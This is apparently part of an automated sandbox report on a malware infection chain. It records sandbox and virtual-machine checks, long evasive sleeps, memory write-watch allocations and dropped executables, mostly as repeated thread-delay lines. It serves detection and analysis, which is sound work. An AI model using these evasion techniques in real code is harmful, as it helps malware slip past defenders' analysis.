Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe.28.dr	Binary or memory string: SBIEDLL.DLLCYPRXF4YDFY6QMQHUAXZT5XLEAGZGVJ3A0GTSHCUZNG06Y5STECU0VFHSQJW8F9JVXKHIZOE3AKCLUOQWFHDGCKXZU8MLY2AIRDMC4ZKAOLOTU0OP35YNQFJXNACVRI1O5YC8G65GRE3VQLU3ILCNNCDKTAI1U61CGKVFHFGDS6ABUAJ4CPKYCVYNZFVRTG8CHS1VDCZCHBDLKTDPNQWQKMSFLTBTZNXIDYAJWWSIZWFBCL7VYZ2LPUJ3GCJHXOE42DJINC9H5K5AGSJQMP8HV7AX4J94NTHIOF0K5ACLEKPCPSFME7TKJRC45CKXXDHYXUEKBVGDJLHVKZY5XDQVJBCFQ9OOUCCEEILJSWQUHXZ8S2UYL5DT63P3LIW7SPVRA0ABTNT91H5XMQ1C7F8XHDDJNWN6EOHW3HG9SOGOGADEQA5U71OGSHQYSBBEV6LPZC3C0VGSTLA8FFNOWMZA72I0XSI7ALQJN2HFITO6ZQFFB87JJA3CETI1BTNOUIRFPUCCHJ2LGWTHJYAGJI7PFFCOSVPKFZOOFBBPNCE1LYP96B0AVSJD670IMO5OC4IRI8OAPZAAJH5KZXI4Q8EXPPSCHX0GTXXDRQ6PJXSK6NWIOUQLPSUWJX4CNVETJSLZNPUS1JKDWCYP93OZBIIMYY4PG58CDFARWFX1YWVGE1PJ8LZR9TMVNUVEGAACJJNTK9EXVQA7K4AU4N4RZIZRTGDKNT9XUK8PUI6GT1KPGERR9INFO
Source: Cerker.exe, 0000001B.00000002.3268115258.00000000001CD000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Cerker.exe, 0000001B.00000002.3268115258.00000000001CD000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: QSBIEDLL.DLL
Source: kitty.exe, 00000018.00000002.3280507784.0000000000DE9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: VSBIEDLL.DLL
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\JQ
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,JQ

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Memory allocated: F50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Memory allocated: 1AB60000 memory reserve \| memory write watch
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Memory allocated: 1B030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory allocated: 220B75C0000 memory reserve \| memory write watch
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Memory allocated: 1240000 memory reserve \| memory write watch
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Memory allocated: 1ADE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: 22C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: 2400000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: 4400000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4DB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: 2730000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: 27A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: 47A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 16A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 32D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 52D0000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Contains long sleeps (>= 3 min)

Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599876
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599748
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599593
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599475
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599359
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599192
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598829
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598466
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598275
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598122
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597959
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597755
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597609
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597491
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597372
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597219
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597090
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596831
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596712
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596566
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596440
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596323
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596204
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596070
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595880
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595695
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595055
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594851
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594684
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594568
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594447
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594326
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594205
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594044
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593923
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593802
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593666
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593555
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593395
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593270
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593136
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593024
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592894
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592725
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592572
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592428
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591935
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591600
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591422
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591188
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591072
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590942
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590798
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590645
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590517
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590400
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590274
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590129
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589991
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589830
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589589
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589386
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589203
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589102
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588832
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588576
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588213
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587769
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587619
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587501
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587354
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587144
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586881
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586638
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586470
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586105
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585905
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585639
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585310
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584895
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584640
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584286
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584155
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Window / User API: threadDelayed 568
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Window / User API: threadDelayed 5552
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Window / User API: threadDelayed 4100
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Window / User API: threadDelayed 1634

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Dropped PE file which has not been started: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000223001\36f677264b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Dropped PE file which has not been started: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	API coverage: 7.3 %
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	API coverage: 3.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7584	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7632	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7584	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7324	Thread sleep count: 568 > 30
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7324	Thread sleep time: -5680000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 2284	Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -90918s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599876s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 1120	Thread sleep count: 5552 > 30
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599748s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 1120	Thread sleep count: 4100 > 30
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599593s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599475s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599359s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -88365s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -599192s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598829s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598466s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598275s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -598122s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597959s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597755s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597609s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597491s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597372s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597219s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -597090s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596969s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596831s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596712s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596566s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596440s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596323s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596204s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -596070s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -595880s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -595695s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -595055s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594851s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594684s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594568s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594447s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594326s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594205s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -594044s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593923s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593802s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593666s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -87631s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593555s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593395s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593270s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593136s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -593024s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592894s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592725s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592572s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -592428s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591935s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591600s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591422s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591314s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591188s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -591072s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590942s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590798s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590645s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590517s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590400s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590274s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -590129s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589991s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589830s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589589s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589386s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589203s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -589102s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588969s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588832s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588576s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -588213s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536	Thread sleep time: -96076s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587769s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587619s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587501s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587354s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -587144s >= -30000s
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208	Thread sleep time: -586881s >= -30000s
